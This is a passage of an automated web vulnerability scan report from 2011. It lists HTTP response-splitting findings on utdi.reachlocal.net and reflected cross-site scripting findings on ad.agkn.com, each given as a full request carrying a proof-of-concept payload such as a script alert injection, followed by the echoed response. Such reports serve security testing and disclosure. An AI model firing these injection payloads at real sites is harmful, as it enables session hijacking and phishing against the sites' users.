Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Apache
Location: http://utdi.com/d9d65
27fb644bc97
/partner-logos-sonexis.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:10 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d9d65
27fb644bc97/partner-logo
...[SNIP]...

1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/productpic_avaya1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36765%0d%0acd72234d30c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36765%0d%0acd72234d30c/productpic_avaya1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:01 GMT
Server: Apache
Location: http://utdi.com/36765
cd72234d30c
/productpic_avaya1.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36765
cd72234d30c/productpic_a
...[SNIP]...

1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d288a%0d%0a00c7c1b4fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d288a%0d%0a00c7c1b4fe2/spacer.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Apache
Location: http://utdi.com/d288a
00c7c1b4fe2
/spacer.gif
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d288a
00c7c1b4fe2/spacer.gif">
...[SNIP]...

2. Cross-site scripting (reflected)
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1329d"><script>alert(1)</script>68ab14b7166 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKBAAAAAAkBArwBATUBC%2FABoAADAUIBBQABQwEFAAFBAQUAAQK8fhdn5xh1LAY%2FAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:53 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=462918736?imid=1686570677704590911&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3783"><script>alert(1)</script>e292a848299 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA0BArwBATUBC%2FAB4AADAUIBBwABQwEHAAFBAQcAAQK8fhIojCjOb%2FrIAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect=http://ad.agkn.com/interaction!che=83841845?imid=1308449798641154760&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4a4"><script>alert(1)</script>52debf145d7 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAAsBArwBATUBC%2FABwAADAUIBBgABQwEGAAFBAQYAAQK8fniLvnViAKPrAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=2040497228?imid=8686245717678793707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b84a"><script>alert(1)</script>edb5176eb5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABEBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjH%2FMgJ0ufACAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1http://ad.agkn.com/interaction!che=1716110508?imid=3602653213049352194&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf115"%3balert(1)//760f2f14d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf115";alert(1)//760f2f14d5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115"%3balert(1)//760f2f14d5b=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABMBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8flg7HoVyhy11AAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
